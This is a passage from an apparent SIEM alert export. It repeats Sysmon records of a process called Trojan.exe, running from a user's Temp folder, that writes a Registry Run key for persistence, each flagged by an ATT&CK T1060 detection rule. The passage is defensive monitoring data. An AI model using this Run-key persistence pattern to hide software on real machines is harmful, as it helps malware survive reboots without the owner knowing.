Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:45.533",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:42.121 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:42.123879600Z"",""eventRecordID"":""1850"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:42.121\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:42.121"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:44.548",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:41.090 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:41.092564600Z"",""eventRecordID"":""1849"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:41.090\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:41.090"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:44.424",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:40.074 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:40.077019200Z"",""eventRecordID"":""1848"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:40.074\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:40.074"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:43.328",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:39.058 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:39.061399600Z"",""eventRecordID"":""1847"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:39.058\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:39.058"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:42.048",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:38.045 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:38.056010800Z"",""eventRecordID"":""1846"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:38.045\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:38.045"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:40.657",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:37.027 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:37.029172200Z"",""eventRecordID"":""1845"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:37.027\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:37.027"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:39.453",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:36.011 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:36.016327100Z"",""eventRecordID"":""1844"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:36.011\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:36.011"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:38.486",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:34.996 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:35.003054700Z"",""eventRecordID"":""1843"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:34.996\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:34.996"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:38.258",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:33.980 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:33.986443000Z"",""eventRecordID"":""1842"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:33.980\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:33.980"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:36.814",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:32.965 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:32.967286200Z"",""eventRecordID"":""1841"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:32.965\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:32.965"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:35.688",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:31.949 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:31.951171000Z"",""eventRecordID"":""1840"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:31.949\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:31.949"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John 